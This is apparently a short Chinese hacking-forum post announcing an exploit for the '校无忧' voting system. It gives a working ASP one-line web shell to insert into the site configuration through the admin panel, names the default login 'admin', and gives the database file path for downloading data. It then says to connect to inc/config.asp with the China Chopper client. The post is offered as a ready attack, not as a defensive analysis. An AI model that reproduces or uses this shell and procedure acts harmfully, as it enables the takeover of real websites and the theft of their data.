校无忧投票系统利用0day 作者:hack1990 时间:12-06-23 阅读数:720人阅读 后台拿shell的方法呢, 在网站配置的地方插入一句话,这个普通的一句话是不能用的要用变异的一句话,插入,测试成功 一句话: view sourceprint?1 "%><%execute(request("xiaoma"))%><%'嘿嘿,这个是变异的,普通的不能用哦默认帐号密码:admin 这个通杀率很高,实在不行我们可一下载数据库数据库地址:data/xiao5u.mdb插入一句话以后。菜刀连接 www.xx.com/inc/config.asp # Nmap Security Scanner 7.0 上一篇:美特斯邦威官方商城几个盲注 下一篇:DR.COM城市热点GetPassword-0day漏洞&exp
